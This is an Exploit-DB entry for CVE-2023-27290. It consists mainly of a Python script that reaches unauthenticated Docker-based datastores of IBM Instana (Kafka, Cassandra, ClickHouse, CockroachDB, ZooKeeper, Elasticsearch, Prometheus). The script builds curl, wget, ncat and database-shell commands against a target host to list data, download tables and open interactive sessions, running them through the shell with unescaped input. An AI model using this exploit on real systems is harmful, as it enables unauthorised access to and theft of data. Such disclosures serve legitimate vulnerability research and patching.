Docker based datastores for IBM Instana 241-2 243-0 - No Authentication

EDB-ID:

51314

CVE:

2023-27290

EDB Verified:

Author:

Shahid Parvez (zippon)

Type:

remote

Exploit: /

Platform:

Multiple

Date:

2023-04-07

Vulnerable App:

# Exploit Title: Docker based datastores for IBM Instana 241-2 243-0 - No Authentication 
# Google Dork: [if applicable]
# Date: 06 March 2023
# Exploit Author: Shahid Parvez (zippon)
# Vendor Homepage: https://www.instana.com/trial/ *and* https://www.ibm.com/docs/en/instana-observability
# Software Link: https://www.ibm.com/docs/en/instana-observability/current?topic=premises-operations-docker-based-instana
# Version: [Vulnerable version : 239-0 to 239-2 241-0 to 241-2 243-0] (REQUIRED Version : 241-3)
# Tested on: [Mac os]
# CVE : CVE-2023-27290
import argparse
import subprocess
import pexpect

# Define the available options and their corresponding commands
COMMANDS = {
    "kafka": "kafka-topics --bootstrap-server {host}:{port} --list --exclude-internal",
    "cassandra": "/bin/bash -c 'cqlsh {host} {port} && exit'",
    "clickhouse": 'curl --insecure "http://{host}:{port}/?query=SELECT%20*%20FROM%20system.tables"',
    "cockroach": "cockroach sql --host {host}:{port} --insecure",
    "zookeeper": "echo dump |ncat {host} {port}",
    "node-export": "curl http://{host}:{port}",
    "elasticsearch": "curl http://{host}:{port}/_cat/indices?v",
    "prometheus": "curl http://{host}:{port}/metrics",
    "clickhouse": 'wget -O system_tables.csv "http://{host}:{port}/?query=SELECT%20*%20FROM%20system.tables"'
}

# Define the parser for command-line arguments
parser = argparse.ArgumentParser(description="Script to run various commands on a host.")
parser.add_argument("host", help="The host IP address")
parser.add_argument("option", choices=COMMANDS.keys(), help="Select an option")
parser.add_argument("--port", type=int, default=None, help="The port number (default: use default port for the selected option)")
parser.add_argument("--output", help="Output the result to a file")
parser.add_argument("--verbose", action="store_true", help="Print the command line that was executed")

# Parse the command-line arguments
args = parser.parse_args()

# Determine the port number to use
if args.port is None:
    if args.option == "cassandra":
        port = "9042"
    elif args.option == "clickhouse":
        port = "8123"
    elif args.option == "cockroach":
        port = "26257"
    elif args.option == "elasticsearch":
        port = "9200"
    elif args.option == "kafka":
        port = "9092"
    elif args.option == "node-export":
        port = "8181"
    elif args.option == "prometheus":
        port = "9090"
    elif args.option == "zookeeper":
        port = "2181"
else:
    port = str(args.port)

# Build the command to execute
command = COMMANDS[args.option].format(host=args.host, port=port)

# Print the command line if verbose option is provided
if args.verbose:
    print(f"Executing command: {command}")

# If cassandra or cockroach option is selected, use pexpect to communicate inside the interactive shell
if args.option == "cassandra":
    child = pexpect.spawn(command)
    child.expect("Connected to.*", timeout=10)
    child.interact()
    output = child.before
elif args.option == "cockroach":
    child = pexpect.spawn(command)
    child.expect("root@.*:", timeout=10)
    child.interact()
    output = child.before
# If any other option is selected, execute the command and capture the output
else:
    output = subprocess.check_output(command, shell=True)

# If an output file is provided, write the output to the file
if args.output:
    with open(args.output, "wb") as f:
        f.write(output)

# Print the output to the console
print(output.decode())

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services